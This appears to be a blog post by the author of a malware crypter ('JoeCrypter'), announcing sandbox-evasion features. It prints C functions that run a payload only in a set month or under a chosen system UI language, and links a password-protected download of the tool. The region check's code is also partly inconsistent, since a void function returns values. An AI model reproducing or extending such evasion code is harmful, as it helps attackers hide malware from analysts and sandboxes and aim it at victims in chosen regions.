JoeCrypter Update and more

Hey hey hey!

Been gone a while, but not forever. I’m back with an update to my crypter. I was on the plane over the Pacific during a long ass flight when it hit me – 2 new ways to evade analysis.

  • Date specific checks
  • Region specific checks

I’ve added the functionality to JoeCrypter and have also added a switch to disable the music (help menu). When I think of more evasions, I will add them to the app.

The code is simple enough. Basic std time structures to check for the date and only run for 1 month.

void date_specific_check(char *shortdate)
{
	time_t rawtime;
	struct tm * timeinfo;
  	char currentdate[80];
  	time (&rawtime);
  	timeinfo = localtime(&rawtime);
	strftime(currentdate,80,"%d/%m/%Y",timeinfo);

	//get current date, check against current month
	if(strstr(currentdate,shortdate))
	{
		return;	// clean return
	}
	else{
	PassToNoobs();
	}
}

The region specific check uses the GetSystemDefaultUILanguage api to grab the current language set and checks against the language passed from the main program.
I’ve omitted some code for space.

void region_specific_check(char *region)
{
LANGID id;
char *lang = "";

	  id = GetSystemDefaultUILanguage();
	  switch(id)
	  {
		case 0x0000: lang = "Language Neutral"; break;
		case 0x007f: lang = "Locale Invariant"; break;
		case 0x0400: lang = "User Default Language"; break;
		case 0x0800: lang = "System Default Language"; break;
		case 0x0436: lang = "Afrikaans"; break;
		case 0x041c: lang = "Albanian"; break;
		case 0x0401: lang = "Arabic (Saudi Arabia)"; break;
...
...
...
  }
		if(strcmp(lang,region))
		{
			
			return 1;

		}
		else
		{
			PassToNoobs();
		}
	return 0;
}

Easy enough right? This ensures our target is only executed in the region we want. The latest version of the crypter is JoeCrypter The password is ‘gironsec’.

I will be doing the PIN stuff next post, but for now, enjoy the crypter.

Happy hacking!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.